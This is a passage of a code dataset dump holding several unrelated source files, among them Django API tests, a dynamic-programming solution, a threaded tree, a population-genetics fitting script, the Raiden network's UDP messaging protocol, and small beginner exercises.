self.client.force_login(self.admin_account.user)\n\n        response = self.client.get(self.answer_list_url)\n\n        self.assertEqual(response.status_code, status.HTTP_200_OK)\n        self.assertEqual(len(response.data), 2)\n        self.assertNotIn(self.answer_other_question.pk, [answer['id'] for answer in response.data])\n\n    def test_user_get_own_answers_from_one_question(self):\n        response = self.client.get(self.answer_list_url)\n\n        self.assertEqual(response.status_code, status.HTTP_200_OK)\n        self.assertEqual(len(response.data), 1)\n        self.assertEqual(response.data[0]['id'], self.answer.pk)\n\n    def 
test_get_answers_wrong_question(self):\n wrong_url = reverse('answer-list', args=(0,))\n response = self.client.get(wrong_url)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data, [])\n\n\nclass SubmitAnswerTestCase(test.APITestCase):\n @classmethod\n def setUpTestData(cls):\n cls.question = CardQuestionFactory()\n cls.answer_list_url = reverse('answer-list', args=(cls.question.pk,))\n cls.account = AccountFactory()\n\n def setUp(self):\n self.answer_data = {\n \"content\": self.question.correct_answer\n }\n self.client.force_login(self.account.user)\n\n def test_correct_data(self):\n response = self.client.post(self.answer_list_url, data=self.answer_data)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertTrue(CardAnswer.objects.exists())\n\n def test_correct_author(self):\n response = self.client.post(self.answer_list_url, data=self.answer_data)\n\n self.assertEqual(response.data.get('author'), self.account.pk)\n\n def test_correct_question(self):\n response = self.client.post(self.answer_list_url, data=self.answer_data)\n\n self.assertEqual(response.data.get('question'), self.question.pk)\n\n def test_wrong_answer(self):\n self.answer_data['content'] = 'wrong answer'\n\n response = self.client.post(self.answer_list_url, data=self.answer_data)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertFalse(response.data.get('correct'))\n\n def test_correct_answer(self):\n response = self.client.post(self.answer_list_url, data=self.answer_data)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertTrue(response.data.get('correct'))\n\n def test_question_does_not_exist(self):\n wrong_question = reverse('answer-list', args=(self.question.pk + 1,))\n\n response = self.client.post(wrong_question, self.answer_data)\n\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n","sub_path":"backend/cards/tests/test_answers.py","file_name":"test_answers.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"466111316","text":"class Solution:\n\n def helper(self, jobs, d, index):\n\n if d == 1:\n # print(index)\n return max(jobs[index:])\n\n if (index, d) in self.visited:\n return self.visited[(index, d)]\n\n difficulty = float('inf')\n\n for i in range(index + 1, len(jobs)):\n # print(i)\n # print(max(jobs[index:i]))\n local_difficulty = max(jobs[index: i]) + self.helper(jobs, d - 1, i)\n difficulty = min(difficulty, local_difficulty)\n\n self.visited[(index, d)] = difficulty\n return difficulty\n\n def minDifficulty(self, jobDifficulty: List[int], d: int) -> int:\n\n self.visited = {}\n ans = self.helper(jobDifficulty, d, 0)\n # print(self.visited)\n return ans if ans != float('inf') else -1\n","sub_path":"1335_Minimum_Difficulty_Of_A_Job_Schedule.py","file_name":"1335_Minimum_Difficulty_Of_A_Job_Schedule.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"651713998","text":"# datatasks\\TransformationEntity.py\nimport re\nfrom datatasks.sources import DataSource\nfrom .DataPlanBuilderMixin import DataPlanBuilderMixin\n\n\n\nclass TransformationEntity(DataSource, DataPlanBuilderMixin):\n \"\"\"DataEntity built from instructions.\"\"\"\n\n def __init__(self, name, instructions):\n super().__init__(name)\n self.process_instructions(instructions)\n 
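# the keys for this entity's records are derived from the instructions themselves\n        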
self.set_record_keys(instructions)\n\n    def set_record_keys(self, instructions):\n        \"\"\" Collect the key for each record: the left-hand side of every instruction. \"\"\"\n        key_list = []\n        for i in instructions:\n            if isinstance(i, tuple):\n                i = i[0]\n            key_list.append(re.split(r'=|<=|=>|<\\\-|\\\+', i)[0])\n        super().set_keys(key_list)\n\n    def execute(self):\n        \"\"\" \"\"\"\n        try:\n            left_entity = self._dem.get_entity(self.joins[0].left_entity_name)\n        except IndexError:\n            left_entity = self._dem.get_entity(self.operations[0].left_entity_name)\n        for record in left_entity:\n            if self.joins:\n                self._process_joins(record, left_entity.name, self.joins.copy())\n            elif self.operations:\n                self._process_operations(record, left_entity.name)\n        self._process_aliases()\n\n    def read_in(self):\n        \"\"\" \"\"\"\n        if not self.loaded:\n            self.loaded = True\n            self.execute()\n\n    def _process_joins(self, records, left_entity_name, joins):\n        \"\"\" \"\"\"\n        if not isinstance(records, list):\n            records = [records,]\n        if joins:\n            join = joins.pop(0)\n            results = []\n            for record in records:\n                results += (join.execute(record, left_entity_name, self._dem.get_entity(join.right_entity_name)))\n            self._process_joins(results, left_entity_name, joins)\n        else:\n            if not records:\n                return\n            self.load(records)\n\n    def _process_operations(self, record, left_entity_name):\n        \"\"\" \"\"\"\n        record_key_prefix = left_entity_name + '.'\n        new_record = dict([(record_key_prefix + k, v) for k, v in record.items() if not k.startswith('_')])\n        for operation in self.operations:\n            operation.execute(new_record)\n        self.load([new_record,])\n\n    def _process_aliases(self):\n        \"\"\" \"\"\"\n        if not self.aliases:\n            return\n        for record in self:\n            for alias in self.aliases:\n                record[alias[1]] = record.pop(alias[0])\n        record_keys = self.key_list.copy()\n        for i, key in enumerate(record_keys):\n            for alias in self.aliases:\n                if alias[0] == key:\n                    self.key_list[i] = alias[1]\n\n    def unqualify_fields(self):\n        \"\"\" Strip the 'entity.' qualifier from every field name. \"\"\"\n        for record in self:\n            # iterate over a snapshot of the keys; popping while iterating the live view raises RuntimeError\n            for key in list(record.keys()):\n                if '.' 
in key:\n                    record[re.split(r'[.]', key)[1]] = record.pop(key)\n        super().set_keys(list(self[0].keys()))","sub_path":"datatasks/TransformationEntity.py","file_name":"TransformationEntity.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"609728938","text":"from Node import *\n\n\nclass thread (Trees):\n    def createThread(self, root, key):\n        newnode = ThreadedNode(key)\n        current = root\n        while True:\n            parent = current\n            if root is None:\n                return ThreadedNode(key)\n\n            if key == current.val:\n                return root\n            elif key < current.val:\n                current = current.left\n                if current is None:\n                    # new left child; its right thread points back to the parent, its inorder successor\n                    newnode.right = parent\n                    newnode.rightthread = True\n                    parent.left = newnode\n                    return root\n            elif key > current.val:\n                if not current.rightthread:\n                    current = current.right\n                    if current is None:\n                        parent.right = newnode\n                        return root\n                else:\n                    # splice the new node in between current and its threaded successor\n                    current.rightthread = False\n                    newnode.right = current.right\n                    current.right = newnode\n                    newnode.rightthread = True\n\n                    return root\n\n    def InorderThread(self, root):\n        node = self.left(root)\n\n        while node != None:\n            print(node.val, end=' ')\n            if node.rightthread:\n\n                node = node.right\n            else:\n                node = self.left(node.right)\n\n\n\n\n\n    def left(self, node):\n        if node is None:\n\n            return None\n        else:\n            while node.left != None:\n                node = node.left\n\n\n            return node\n\n\n    def display(self, root):\n        self.InorderThread(root)\n\n","sub_path":"tree/ThreadedTree.py","file_name":"ThreadedTree.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"625378212","text":"import sys\nimport os\nimport numpy\nimport dadi\nfrom dadi import Numerics, PhiManip, Integration\nfrom dadi.Spectrum_mod import Spectrum\nimport Optimize_Functions\nimport dd_models\n\nfunc=dd_models.isolation_sym_mig\n\nsnps = \"dadi.thin1k.txt\"\n\ndd = dadi.Misc.make_data_dict(snps)\n\npop_ids=[\"mi\", \"nomi\"]\n\nproj = [45,180]\n\nfs = dadi.Spectrum.from_data_dict(dd, pop_ids=pop_ids, projections = proj, polarized = False)\n\nfs.mask[1,0]=True\nfs.mask[0,1]=True\n\n# These are the grid point settings we will use for extrapolation.\npts = [120,160,200]\n\nprefix = \"optim_d/isolation_sym_mig\"\n\np_labels = \"nu1a, nu2a, T1, nu1b, nu2b, T2, m\"\n\nupper = [100, 100, 10, 100, 100, 10, 100]\nlower = [1e-1, 1e-1, 0, 1e-2, 1e-2, 0, 0]\np0 = [90.8216,1.3095,0.8504,0.0109, 0.1973, 0.0084, 20]\n\nreps = [10,10,10,10]\nmaxiters = [5,5,10,20]\nfolds = [2,1,1,1]\n\n\ni=sys.argv[1]\nOptimize_Functions.Optimize_Routine(fs, pts, prefix+\"_{}\".format(i), func.func_name, func, len(reps), len(p0),\n                                    fs_folded=True, param_labels = p_labels, in_upper=upper, in_lower=lower,\n                                    reps = reps, maxiters = maxiters, folds = folds)\n\n\n\n\n\n\n","sub_path":"hpc/dadi/dd_isolation_sym_mig.py","file_name":"dd_isolation_sym_mig.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"413668644","text":"#best way to get string length\r\nmahadev = '0123456789'\r\nlen(mahadev)\r\n\r\ndef stringLenght(sTring):\r\n    count = 0\r\n    for number in sTring:\r\n        count += 1\r\n    print(count)\r\n\r\n    return count\r\n\r\n\r\nstringLenght('hello')\r\n\r\n\r\n\r\n#last character of string\r\nmahadev = '0123456789'\r\nprint(mahadev[-1])\r\n","sub_path":"pyhon 
practice/stringLength.py","file_name":"stringLength.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"468870302","text":"# -*- coding: utf-8 -*-\nimport logging\nimport random\nfrom collections import (\n namedtuple,\n defaultdict,\n)\nfrom itertools import repeat\n\nimport cachetools\nimport gevent\nfrom gevent.event import (\n _AbstractLinkable,\n AsyncResult,\n Event,\n)\nfrom ethereum import slogging\n\nfrom raiden.exceptions import (\n InvalidAddress,\n InvalidLocksRoot,\n InvalidNonce,\n TransferWhenClosed,\n TransferUnwanted,\n UnknownAddress,\n UnknownTokenAddress,\n)\nfrom raiden.constants import (\n UDP_MAX_MESSAGE_SIZE,\n)\nfrom raiden.settings import (\n CACHE_TTL,\n)\nfrom raiden.messages import decode, Ack, Ping, SignedMessage\nfrom raiden.utils import isaddress, sha3, pex\nfrom raiden.utils.notifying_queue import NotifyingQueue\n\nlog = slogging.get_logger(__name__) # pylint: disable=invalid-name\nping_log = slogging.get_logger(__name__ + '.ping') # pylint: disable=invalid-name\n\n# - async_result available for code that wants to block on message acknowledgment\n# - receiver_address used to tie back the echohash to the receiver (mainly for\n# logging purposes)\nSentMessageState = namedtuple('SentMessageState', (\n 'async_result',\n 'receiver_address',\n))\nHealthEvents = namedtuple('HealthEvents', (\n 'event_healthy',\n 'event_unhealthy',\n))\n\nNODE_NETWORK_UNKNOWN = 'unknown'\nNODE_NETWORK_UNREACHABLE = 'unreachable'\nNODE_NETWORK_REACHABLE = 'reachable'\n\n# GOALS:\n# - Each netting channel must have the messages processed in-order, the\n# protocol must detect unacknowledged messages and retry them.\n# - A queue must not stall because of synchronization problems in other queues.\n# - Assuming a queue can stall, the unhealthiness of a node must not be\n# inferred from the lack of acknowledgement from a single queue, but healthiness\n# may be safely inferred from it.\n# - The state of the node must be synchronized among all tasks that are\n# handling messages.\n\n\ndef event_first_of(*events):\n \"\"\" Waits until one of `events` is set.\n\n The event returned is /not/ cleared with any of the `events`, this value\n must not be reused if the clearing behavior is used.\n \"\"\"\n first_finished = Event()\n\n if not all(isinstance(e, _AbstractLinkable) for e in events):\n raise ValueError('all events must be linkable')\n\n for event in events:\n event.rawlink(lambda _: first_finished.set())\n\n return first_finished\n\n\ndef timeout_exponential_backoff(retries, timeout, maximum):\n \"\"\" Timeouts generator with an exponential backoff strategy.\n\n Timeouts start spaced by `timeout`, after `retries` exponentially increase\n the retry delays until `maximum`, then maximum is returned indefinitely.\n \"\"\"\n yield timeout\n\n tries = 1\n while tries < retries:\n tries += 1\n yield timeout\n\n while timeout < maximum:\n timeout = min(timeout * 2, maximum)\n yield timeout\n\n while True:\n yield maximum\n\n\ndef retry(protocol, data, receiver_address, event_stop, timeout_backoff):\n \"\"\" Send data until it's acknowledged.\n\n Exits when the first of the following happen:\n\n - The packet is acknowledged.\n - Event_stop is set.\n - The iterator timeout_backoff runs out of values.\n\n Returns:\n bool: True if the message was acknowledged, False otherwise.\n \"\"\"\n\n async_result = protocol.send_raw_with_result(\n data,\n receiver_address,\n )\n\n event_quit = event_first_of(\n 
async_result,\n event_stop,\n )\n\n for timeout in timeout_backoff:\n\n if event_quit.wait(timeout=timeout) is True:\n break\n\n protocol.send_raw_with_result(\n data,\n receiver_address,\n )\n\n return async_result.ready()\n\n\ndef wait_recovery(event_stop, event_healthy):\n event_first_of(\n event_stop,\n event_healthy,\n ).wait()\n\n if event_stop.is_set():\n return\n\n # There may be multiple threads waiting, do not restart them all at\n # once to avoid message flood.\n gevent.sleep(random.random())\n\n\ndef retry_with_recovery(\n protocol,\n data,\n receiver_address,\n event_stop,\n event_healthy,\n event_unhealthy,\n backoff):\n \"\"\" Send data while the node is healthy until it's acknowledged.\n\n Note:\n backoff must be an infinite iterator, otherwise this task will\n become a hot loop.\n \"\"\"\n\n # The underlying unhealthy will be cleared, care must be taken to properly\n # clear stop_or_unhealthy too.\n stop_or_unhealthy = event_first_of(\n event_stop,\n event_unhealthy,\n )\n\n acknowledged = False\n while not event_stop.is_set() and not acknowledged:\n\n # Packets must not be sent to an unhealthy node, nor should the task\n # wait for it to become available if the message has been acknowledged.\n if event_unhealthy.is_set():\n wait_recovery(\n event_stop,\n event_healthy,\n )\n\n # Assume wait_recovery returned because unhealthy was cleared and\n # continue execution, this is safe to do because event_stop is\n # checked below.\n stop_or_unhealthy.clear()\n\n if event_stop.is_set():\n return\n\n acknowledged = retry(\n protocol,\n data,\n receiver_address,\n\n # retry will stop when this event is set, allowing this task to\n # wait for recovery when the node becomes unhealthy or to quit if\n # the stop event is set.\n stop_or_unhealthy,\n\n # Intentionally reusing backoff to restart from the last\n # timeout/number of iterations.\n backoff,\n )\n\n return acknowledged\n\n\ndef single_queue_send(\n protocol,\n receiver_address,\n queue,\n event_stop,\n event_healthy,\n event_unhealthy,\n message_retries,\n message_retry_timeout,\n message_retry_max_timeout):\n\n \"\"\" Handles a single message queue for `receiver_address`.\n\n Notes:\n - This task must be the only consumer of queue.\n - This task can be killed at any time, but the intended usage is to stop it\n with the event_stop.\n - If there are many queues for the same receiver_address, it is the\n caller's responsibility to not start them together to avoid congestion.\n - This task assumes the endpoint is never cleared after it's first known.\n If this assumption changes the code must be updated to handle unknown\n addresses.\n \"\"\"\n\n # A NotifyingQueue is required to implement cancelability, otherwise the\n # task cannot be stoped while the greenlet waits for an element to be\n # inserted in the queue.\n if not isinstance(queue, NotifyingQueue):\n raise ValueError('queue must be a NotifyingQueue.')\n\n # Reusing the event, clear must be carefully done\n data_or_stop = event_first_of(\n queue,\n event_stop,\n )\n\n # Wait for the endpoint registration or to quit\n event_first_of(\n event_healthy,\n event_stop,\n ).wait()\n\n while True:\n data_or_stop.wait()\n\n if event_stop.is_set():\n return\n\n # The queue is not empty at this point, so this won't raise Empty.\n # This task being the only consumer is a requirement.\n data = queue.peek(block=False)\n\n backoff = timeout_exponential_backoff(\n message_retries,\n message_retry_timeout,\n message_retry_max_timeout,\n )\n\n acknowledged = retry_with_recovery(\n 
protocol,\n data,\n receiver_address,\n event_stop,\n event_healthy,\n event_unhealthy,\n backoff,\n )\n\n if acknowledged:\n queue.get()\n\n # Checking the length of the queue does not trigger a\n # context-switch, so it's safe to assume the length of the queue\n # won't change under our feet and when a new item will be added the\n # event will be set again.\n if not queue:\n data_or_stop.clear()\n\n if event_stop.is_set():\n return\n\n\ndef healthcheck(\n protocol,\n receiver_address,\n event_stop,\n event_healthy,\n event_unhealthy,\n nat_keepalive_retries,\n nat_keepalive_timeout,\n nat_invitation_timeout,\n ping_nonce):\n\n \"\"\" Sends a periodical Ping to `receiver_address` to check its health. \"\"\"\n\n # The state of the node is unknown, the events are set to allow the tasks\n # to do work.\n protocol.set_node_network_state(\n receiver_address,\n NODE_NETWORK_UNKNOWN,\n )\n\n # Always call `clear` before `set`, since only `set` does context-switches\n # it's easier to reason about tasks that are waiting on both events.\n\n # Wait for the end-point registration or for the node to quit\n try:\n protocol.get_host_port(receiver_address)\n except UnknownAddress:\n event_healthy.clear()\n event_unhealthy.set()\n\n backoff = timeout_exponential_backoff(\n nat_keepalive_retries,\n nat_keepalive_timeout,\n nat_invitation_timeout,\n )\n sleep = next(backoff)\n\n while not event_stop.wait(sleep):\n try:\n protocol.get_host_port(receiver_address)\n except UnknownAddress:\n sleep = next(backoff)\n else:\n break\n\n # Don't wait to send the first Ping and to start sending messages if the\n # endpoint is known\n sleep = 0\n event_unhealthy.clear()\n event_healthy.set()\n\n while not event_stop.wait(sleep):\n sleep = nat_keepalive_timeout\n\n ping_nonce['nonce'] += 1\n data = protocol.get_ping(\n ping_nonce['nonce'],\n )\n\n # Send Ping a few times before setting the node as unreachable\n acknowledged = retry(\n protocol,\n data,\n receiver_address,\n event_stop,\n [nat_keepalive_timeout] * nat_keepalive_retries,\n )\n\n if event_stop.is_set():\n return\n\n if not acknowledged:\n # The node is not healthy, clear the event to stop all queue\n # tasks\n protocol.set_node_network_state(\n receiver_address,\n NODE_NETWORK_UNREACHABLE,\n )\n event_healthy.clear()\n event_unhealthy.set()\n\n # Retry until recovery, used for:\n # - Checking node status.\n # - Nat punching.\n acknowledged = retry(\n protocol,\n data,\n receiver_address,\n event_stop,\n repeat(nat_invitation_timeout),\n )\n\n if acknowledged:\n event_unhealthy.clear()\n event_healthy.set()\n protocol.set_node_network_state(\n receiver_address,\n NODE_NETWORK_REACHABLE,\n )\n\n\nclass RaidenProtocol(object):\n \"\"\" Encode the message into a packet and send it.\n\n Each message received is stored by hash and if it is received twice the\n previous answer is resent.\n\n Repeat sending messages until an acknowledgment is received or the maximum\n number of retries is hit.\n \"\"\"\n\n def __init__(\n self,\n transport,\n discovery,\n raiden,\n retry_interval,\n retries_before_backoff,\n nat_keepalive_retries,\n nat_keepalive_timeout,\n nat_invitation_timeout):\n\n self.transport = transport\n self.discovery = discovery\n self.raiden = raiden\n\n self.retry_interval = retry_interval\n self.retries_before_backoff = retries_before_backoff\n\n self.nat_keepalive_retries = nat_keepalive_retries\n self.nat_keepalive_timeout = nat_keepalive_timeout\n self.nat_invitation_timeout = nat_invitation_timeout\n\n self.event_stop = Event()\n\n 
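# ordered queues of outgoing packets, keyed by (receiver address, token address)\n        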
self.channel_queue = dict() # TODO: Change keys to the channel address\n self.greenlets = list()\n self.addresses_events = dict()\n self.nodeaddresses_networkstatuses = defaultdict(lambda: NODE_NETWORK_UNKNOWN)\n\n # Maps the echohash of received and *sucessfully* processed messages to\n # its Ack, used to ignored duplicate messages and resend the Ack.\n self.receivedhashes_to_acks = dict()\n\n # Maps the echohash to a SentMessageState\n self.senthashes_to_states = dict()\n\n # Maps the addresses to a dict with the latest nonce (using a dict\n # because python integers are immutable)\n self.nodeaddresses_to_nonces = dict()\n\n cache = cachetools.TTLCache(\n maxsize=50,\n ttl=CACHE_TTL,\n )\n cache_wrapper = cachetools.cached(cache=cache)\n self.get_host_port = cache_wrapper(discovery.get)\n\n def start(self):\n self.transport.start()\n\n def stop_and_wait(self):\n # Stop handling incoming packets, but don't close the socket. The\n # socket can only be safely closed after all outgoing tasks are stopped\n self.transport.stop_accepting()\n\n # Stop processing the outgoing queues\n self.event_stop.set()\n gevent.wait(self.greenlets)\n\n # All outgoing tasks are stopped. Now it's safe to close the socket. At\n # this point there might be some incoming message being processed,\n # keeping the socket open is not useful for these.\n self.transport.stop()\n\n # Set all the pending results to False\n for waitack in self.senthashes_to_states.itervalues():\n waitack.async_result.set(False)\n\n def get_health_events(self, receiver_address):\n \"\"\" Starts a healthcheck taks for `receiver_address` and returns a\n HealthEvents with locks to react on its current state.\n \"\"\"\n if receiver_address not in self.addresses_events:\n self.start_health_check(receiver_address)\n\n return self.addresses_events[receiver_address]\n\n def start_health_check(self, receiver_address):\n \"\"\" Starts a task for healthchecking `receiver_address` if there is not\n one yet.\n \"\"\"\n if receiver_address not in self.addresses_events:\n ping_nonce = self.nodeaddresses_to_nonces.setdefault(\n receiver_address,\n {'nonce': 0}, # HACK: Allows the task to mutate the object\n )\n\n events = HealthEvents(\n event_healthy=Event(),\n event_unhealthy=Event(),\n )\n\n self.addresses_events[receiver_address] = events\n\n self.greenlets.append(gevent.spawn(\n healthcheck,\n self,\n receiver_address,\n self.event_stop,\n events.event_healthy,\n events.event_unhealthy,\n self.nat_keepalive_retries,\n self.nat_keepalive_timeout,\n self.nat_invitation_timeout,\n ping_nonce,\n ))\n\n def get_channel_queue(self, receiver_address, token_address):\n key = (\n receiver_address,\n token_address,\n )\n\n if key in self.channel_queue:\n return self.channel_queue[key]\n\n queue = NotifyingQueue()\n self.channel_queue[key] = queue\n\n events = self.get_health_events(receiver_address)\n\n self.greenlets.append(gevent.spawn(\n single_queue_send,\n self,\n receiver_address,\n queue,\n self.event_stop,\n events.event_healthy,\n events.event_unhealthy,\n self.retries_before_backoff,\n self.retry_interval,\n self.retry_interval * 10,\n ))\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'new queue created for',\n node=pex(self.raiden.address),\n token=pex(token_address),\n to=pex(receiver_address),\n )\n\n return queue\n\n def send_async(self, receiver_address, message):\n if not isaddress(receiver_address):\n raise ValueError('Invalid address {}'.format(pex(receiver_address)))\n\n if isinstance(message, (Ack, Ping)):\n raise ValueError('Do not 
use send for Ack or Ping messages')\n\n # Messages that are not unique per receiver can result in hash\n # collision, e.g. Secret messages. The hash collision has the undesired\n # effect of aborting message resubmission once /one/ of the nodes\n # replied with an Ack, adding the receiver address into the echohash to\n # avoid these collisions.\n messagedata = message.encode()\n echohash = sha3(messagedata + receiver_address)\n\n if len(messagedata) > UDP_MAX_MESSAGE_SIZE:\n raise ValueError(\n 'message size exceeds the maximum {}'.format(UDP_MAX_MESSAGE_SIZE)\n )\n\n # All messages must be ordered, but only on a per channel basis.\n token_address = getattr(message, 'token', '')\n\n # Ignore duplicated messages\n if echohash not in self.senthashes_to_states:\n async_result = AsyncResult()\n self.senthashes_to_states[echohash] = SentMessageState(\n async_result,\n receiver_address,\n )\n\n queue = self.get_channel_queue(\n receiver_address,\n token_address,\n )\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'SENDING MESSAGE',\n to=pex(receiver_address),\n node=pex(self.raiden.address),\n message=message,\n echohash=pex(echohash),\n )\n\n queue.put(messagedata)\n else:\n waitack = self.senthashes_to_states[echohash]\n async_result = waitack.async_result\n\n return async_result\n\n def send_and_wait(self, receiver_address, message, timeout=None):\n \"\"\"Sends a message and wait for the response ack.\"\"\"\n async_result = self.send_async(receiver_address, message)\n return async_result.wait(timeout=timeout)\n\n def maybe_send_ack(self, receiver_address, ack_message):\n \"\"\" Send ack_message to receiver_address if the transport is running. \"\"\"\n if not isaddress(receiver_address):\n raise ValueError('Invalid address {}'.format(pex(receiver_address)))\n\n if not isinstance(ack_message, Ack):\n raise ValueError('Use maybe_send_ack only for Ack messages')\n\n messagedata = ack_message.encode()\n self.receivedhashes_to_acks[ack_message.echo] = (receiver_address, messagedata)\n self._maybe_send_ack(*self.receivedhashes_to_acks[ack_message.echo])\n\n def _maybe_send_ack(self, receiver_address, messagedata):\n \"\"\" ACK must not go into the queue, otherwise nodes will deadlock\n waiting for the confirmation.\n \"\"\"\n host_port = self.get_host_port(receiver_address)\n\n # ACKs are sent at the end of the receive method, after the message is\n # sucessfully processed. It may be the case that the server is stopped\n # after the message is received but before the ack is sent, under that\n # circumstance the udp socket would be unavaiable and then an exception\n # is raised.\n #\n # This check verifies the udp socket is still available before trying\n # to send the ack. 
There must be *no context-switches after this test*.\n if self.transport.server.started:\n self.transport.send(\n self.raiden,\n host_port,\n messagedata,\n )\n\n def get_ping(self, nonce):\n \"\"\" Returns a signed Ping message.\n\n Note: Ping messages don't have an enforced ordering, so a Ping message\n with a higher nonce may be acknowledged first.\n \"\"\"\n message = Ping(nonce)\n self.raiden.sign(message)\n message_data = message.encode()\n\n return message_data\n\n def send_raw_with_result(self, data, receiver_address):\n \"\"\" Sends data to receiver_address and returns an AsyncResult that will\n be set once the message is acknowledged.\n\n Always returns same AsyncResult instance for equal input.\n \"\"\"\n host_port = self.get_host_port(receiver_address)\n echohash = sha3(data + receiver_address)\n\n if echohash not in self.senthashes_to_states:\n async_result = AsyncResult()\n self.senthashes_to_states[echohash] = SentMessageState(\n async_result,\n receiver_address,\n )\n else:\n async_result = self.senthashes_to_states[echohash].async_result\n\n if not async_result.ready():\n self.transport.send(\n self.raiden,\n host_port,\n data,\n )\n\n return async_result\n\n def set_node_network_state(self, node_address, node_state):\n self.nodeaddresses_networkstatuses[node_address] = node_state\n\n def receive(self, data):\n if len(data) > UDP_MAX_MESSAGE_SIZE:\n log.error('receive packet larger than maximum size', length=len(data))\n return\n\n # Repeat the ACK if the message has been handled before\n echohash = sha3(data + self.raiden.address)\n if echohash in self.receivedhashes_to_acks:\n return self._maybe_send_ack(*self.receivedhashes_to_acks[echohash])\n\n message = decode(data)\n\n if isinstance(message, Ack):\n waitack = self.senthashes_to_states.get(message.echo)\n\n if waitack is None:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'ACK FOR UNKNOWN ECHO',\n node=pex(self.raiden.address),\n echohash=pex(message.echo),\n )\n\n else:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'ACK RECEIVED',\n node=pex(self.raiden.address),\n receiver=pex(waitack.receiver_address),\n echohash=pex(message.echo),\n )\n\n waitack.async_result.set(True)\n\n elif isinstance(message, Ping):\n if ping_log.isEnabledFor(logging.DEBUG):\n ping_log.debug(\n 'PING RECEIVED',\n node=pex(self.raiden.address),\n echohash=pex(echohash),\n message=message,\n sender=pex(message.sender),\n )\n\n ack = Ack(\n self.raiden.address,\n echohash,\n )\n\n self.maybe_send_ack(\n message.sender,\n ack,\n )\n\n elif isinstance(message, SignedMessage):\n if log.isEnabledFor(logging.INFO):\n log.info(\n 'MESSAGE RECEIVED',\n node=pex(self.raiden.address),\n echohash=pex(echohash),\n message=message,\n message_sender=pex(message.sender)\n )\n\n try:\n self.raiden.on_message(message, echohash)\n\n # only send the Ack if the message was handled without exceptions\n ack = Ack(\n self.raiden.address,\n echohash,\n )\n\n try:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'SENDING ACK',\n node=pex(self.raiden.address),\n to=pex(message.sender),\n echohash=pex(echohash),\n )\n\n self.maybe_send_ack(\n message.sender,\n ack,\n )\n except (InvalidAddress, UnknownAddress) as e:\n log.debug(\"Couldn't send the ACK\", e=e)\n\n except (UnknownAddress, InvalidNonce, TransferWhenClosed, TransferUnwanted) as e:\n log.DEV('maybe unwanted transfer', e=e)\n\n except (UnknownTokenAddress, InvalidLocksRoot) as e:\n if log.isEnabledFor(logging.WARN):\n log.warn(str(e))\n\n elif log.isEnabledFor(logging.ERROR):\n log.error(\n 
'Invalid message',\n message=data.encode('hex'),\n )\n","sub_path":"raiden/network/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":24753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"614208333","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom TrainingDataManager import TrainingData \nimport Classifiter\nimport jieba\nimport SmartPath as sp\n\nSEP\t\t\t\t= ' '\t\t\t\t\t\t\t#统一分隔符\nTRAIN_SET\t\t= sp.path('TrainingSet.txt')\t#训练集\nSTOPWORD_DIC\t= sp.path('stop_dict.txt')\t\t#停用词字典\nTEST_SET\t\t= sp.path('TestSet.txt')\t\t#测试集\nNB_FILE\t\t\t= sp.path('NB_RESULT.txt')\t\t#NB结果\nRO_FILE\t\t\t= sp.path('RO_RESULT.txt')\t\t#Rocchio结果\n\ntd = TrainingData(TRAIN_SET, STOPWORD_DIC, 100, SEP)\t#初始化训练集实例\nnb = Classifiter.NaiveBayes(td)\t#NB分类器实例\nro = Classifiter.Rocchio(td)\t#Rocchio分类器实例\n\nClassifiter.evaluate(TEST_SET, NB_FILE, nb, SEP)\nClassifiter.evaluate(TEST_SET, RO_FILE, ro, SEP)\n\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"430068336","text":"# Desafio 044\n\nfrom time import sleep\n\npreço = float(input('Informe o valor do produto: R$ '))\nprint('-=-'*6, 'Condições de Pagamento', '-=-'*6, '''\\n\nOPÇÃO (1): À Vista no Dinheiro - 10% de Desconto.\nOPÇÃO (2): À Vista no Cartão de Crédito - 5% de Desconto.\nOPÇÃO (3): Parcelado no Cartão de Crédito - Até 2x sem Juros.\\n\nPressione 0 para sair.\\n''')\nprint('-=-'*20, '\\n')\nopção = int(input('Informe a opção desejada: '))\nprint('Processando...')\nsleep(2)\nif opção == 1:\n print('O valor final a ser pago pelo produto será de R${:.2f}.'.format(preço-(preço*0.1)))\nelif opção == 2:\n print('O valor final a ser pago pelo produto será de R${:.2f}.'.format(preço-(preço*0.05)))\nelif opção == 3:\n parcelas = int(input('Qual o número total de parcelas? '))\n print('Processando...')\n sleep(2)\n if 0 < parcelas <= 2:\n print('O valor final a ser pago será de R${:.2f}.'.format(preço))\n elif parcelas > 2:\n print('O valor final a ser pago será de R${:.2f}.'.format(preço+(preço*0.2)))\n else:\n print('Erro: número inválido de 